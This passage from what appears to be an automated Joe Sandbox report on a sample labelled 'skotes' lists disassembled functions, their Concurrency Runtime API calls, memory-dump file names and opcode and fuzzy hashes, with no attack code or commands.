                                                          • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 00C0D344
                                                          • ListArray.LIBCONCRT ref: 00C0D367
                                                          • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00C0D370
                                                          • ListArray.LIBCONCRT ref: 00C0D3A8
                                                          • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00C0D3B3
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
                                                          • String ID:
                                                          • API String ID: 4212520697-0
                                                          • Opcode ID: 98d89d95803ba35b0a19c1ce97aede244b681b1817aa158ffc4e13bafc774d33
                                                          • Instruction ID: 920075cbfc0d125c74ed90ec4150b12639556175daeb093cc8ea235baa14bec7
                                                          • Opcode Fuzzy Hash: 98d89d95803ba35b0a19c1ce97aede244b681b1817aa158ffc4e13bafc774d33
                                                          • Instruction Fuzzy Hash: 68319E75700210EFCB05EF94C895BAEB7B6AF88310F144199E8069B3E2DB71ED41DB92
                                                          APIs
                                                          • _SpinWait.LIBCONCRT ref: 00C086EE
                                                            • Part of subcall function 00BFEAD0: _SpinWait.LIBCONCRT ref: 00BFEAE8
                                                          • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00C08702
                                                          • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00C08734
                                                          • List.LIBCMT ref: 00C087B7
                                                          • List.LIBCMT ref: 00C087C6
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                          • String ID:
                                                          • API String ID: 3281396844-0
                                                          • Opcode ID: 32fdfd073cf5ce65768082efae5e88950978cfea3804133fdc161dba36379350
                                                          • Instruction ID: 6011f0f7a5ca16f47becc03f4d54e259e5b2d60e463dc091b767a946edba4256
                                                          • Opcode Fuzzy Hash: 32fdfd073cf5ce65768082efae5e88950978cfea3804133fdc161dba36379350
                                                          • Instruction Fuzzy Hash: 06318F31D05656DFCB14EFA8C5416EDB7B1BF04714F2480AAE59177296CF316E08CB94
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __dosmaperr
                                                          • String ID: H
                                                          • API String ID: 2332233096-2852464175
                                                          • Opcode ID: 21fd7219eb6a972796699378107c9866bed30a704a2a2a492da915e0ec1d5a15
                                                          • Instruction ID: 6230406b5e1a9b4c94315f0c2197ab9822c1f99b6056d32ff1a9d9cba2f2c84e
                                                          • Opcode Fuzzy Hash: 21fd7219eb6a972796699378107c9866bed30a704a2a2a492da915e0ec1d5a15
                                                          • Instruction Fuzzy Hash: 9CA12732A141588FCF19DF68EC91BAE3BB1AF17320F180199EC11AB2D1DB358D52DB52
                                                          APIs
                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C118A4
                                                          • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00C118EB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                          • String ID: pContext
                                                          • API String ID: 3390424672-2046700901
                                                          • Opcode ID: 8532ceab9d8737195e092b407e7eefd5d09d05f0fca46cb6347a38af4d50e8c1
                                                          • Instruction ID: 790d6eaaa0c74e7f5d887b2179c50dbece612cbb1f2820139ddcfd45f311b37f
                                                          • Opcode Fuzzy Hash: 8532ceab9d8737195e092b407e7eefd5d09d05f0fca46cb6347a38af4d50e8c1
                                                          • Instruction Fuzzy Hash: 6A214731B006159BDB14AB68C895AFC73A5BF82334B09412AEE11872D1CF7CED81EB80
                                                          APIs
                                                          • List.LIBCONCRT ref: 00C0AEEA
                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C0AF0F
                                                          • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 00C0AF4E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
